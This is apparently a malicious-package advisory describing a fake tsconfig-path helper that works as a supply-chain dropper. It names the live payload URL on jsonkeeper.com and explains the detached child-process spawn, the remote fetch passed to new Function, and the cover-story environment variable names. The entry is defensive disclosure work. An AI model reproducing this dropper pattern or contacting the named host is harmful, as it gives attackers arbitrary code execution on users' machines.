MAL-2026-4705

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (9a7c9683fed8b8696938eb7ad88e158f70a075851b0dd511af991ecd69a4d0fd) The package presents itself as a vite/tsconfig path helper and clones the public API of tsconfig-paths (createMatchPath, matchFromAbsolutePaths, register, loadConfig). A new exported `configJson` entry point spawns a detached `node lib/mapProps.js` child process via `child_process.spawn(..., { detached: true, stdio: 'ignore' })` (lib/config-loader.js). lib/mapProps.js performs an HTTPS GET to https://www.jsonkeeper.com/b/5IZTJ — an anonymous, mutable JSON paste host — and passes the response's `Cookie` field directly to `new Function('require', s)(require)`, giving the publisher arbitrary code execution inside the consumer process with full `require` access. The fetch URL and header are concealed by shadowing `process` with a local object whose `env` uses cover-story names (DEV_API_KEY, DEV_SECRET_KEY, DEV_SECRET_VALUE) that actually hold the C2 URL and HTTP header. There is no integrity check on the fetched payload; the paste content can be changed at any time by whoever controls the jsonkeeper.com entry. Combined with the cloned legitimate-package API surface, this is a deliberate supply-chain dropper, not a coding mistake.